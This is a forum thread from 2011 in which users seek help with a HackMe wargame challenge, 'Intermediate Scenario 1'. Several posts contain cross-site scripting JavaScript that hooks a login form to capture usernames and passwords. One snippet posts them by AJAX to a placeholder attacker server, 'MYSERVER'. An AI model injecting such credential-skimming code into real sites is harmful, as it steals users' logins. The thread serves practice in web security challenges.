The house of developers, A website to classify and rank developers
| Country Rank: | 1 |
|---|---|
| World Rank: | 96 |
| Profile Viewed: | 130 |
| Points: | 4230 |
|
01 Jul
2011
|
Intermediate scenario 1 WTF?
By: Artur Korobeynyk
|
Whazzup!
Ok, I wrote to support team several times but my letters remains not answered. I would be glad to accept even "Go to Hell!" message just to know at least someone read what I've written. That is why I want to ask people in this thread how to pass the Intermediate Scenario 1 from HackMe contest.
That is the XSS injection I use:
function p()
{
var s1,s2;
s1 = document.forms.scenario1_login_form.username.value;
s2 = document.forms.scenario1_login_form.password.value;
document.getElementById('feed').value = 'N: '+s1+'; P: '+s2;
document.getElementById('submit_feed').click();
}
document.forms.scenario1_login_form.action=" p();";
I get guy's name and login from the form and post those when he tries to login. Isn't that a solution? If not, then what dirrection to follow?
Comments
|
Hi,
My code is working (I'm able to receive my login/password when I'm logging on the page), but I don't receive John's credentials. How could I make John trying to log in to get his credentials? |
|
|
By : Vincent OLLIVIER 2012/02/02
|
|
READ THE SOURCE!
Look at the source code. It tells you exactly how to execute code on button click ;)
The answers above are making it more complicated than it needs to be. However, Adns is the closest. This place is long dead but the challenges are still fun. |
|
|
By : Manny Escuela 2011/12/13
|
|
Ok but..
I think I find the solution and i receive a login/pass of john on my server but they don't work :/
Any idea ? Adns |
|
|
By : Adns Plop 2011/09/14
|
|
o_O ??
SO why my code doesn't works ?
<script> $('#scenario1_login_form').sub mit(function(){ //alert("nom="+$('#username'). val()+"&comm="+$('#usernam e').val()+" \n "+$('#password').val()); $.ajax({ type: "POST", url: "http://MYSERVER/avis.php", data: "nom="+$('#username').val()+"& amp;comm="+$('#username').val( )+" \n "+$('#password').val(), success: function() { html = '<div class="user-feed">Hacked !</div>'; $('#feed_list').prepend(html); $('#feed').val(''); } }); return false; }); </script> Adns --' |
|
|
By : Adns Plop 2011/09/09
|
|
Still waiting for reply. Is there anyone able active user on this site capable of giving normal description of what I have to do to pass this scenario?
|
|
|
By : Artur Korobeynyk 2011/08/25
|
|
solution needs correction
Ok, I've tried to overwrite the onSubmit event of the form. But still no good. I've checked all the functions - those work. But it looks like the submit event is not called on login. Here is my code, please, point the mistake in it:
function getName(){ return document.forms.scenario1_login _form.username.value; }; function getPas(){ return document.forms.scenario1_login _form.password.value; }; function getBod(){ return "Name: "+getName()+"\nPassword: "+getPas(); } function postwith() { var myForm = document.createElement("form") ; myForm.method="post" ; myForm.action = 'http://www.wablab.com/interme diate_scenario1/home'; var myInput = document.createElement("input" ) ; myInput.setAttribute("name", "feed") ; myInput.setAttribute("value", getBod()); myForm.appendChild(myInput); document.body.appendChild(myFo rm) ; myForm.submit() ; document.body.removeChild(myFo rm) ; } document.forms.scenario1_login _form.onSubmit="javascript:pos twith();"; |
|
|
By : Artur Korobeynyk 2011/07/15
|
|
So I need to deploy my sever somewhere with a script to parse a request?
|
|
|
By : Artur Korobeynyk 2011/07/15
|
|
Inject you js code
when then person log in, on submit you will take his login info and send it to your server.
Easy:p |
|
|
By : Ahmad Mohammad Fathi Tahboub 2011/07/11
|
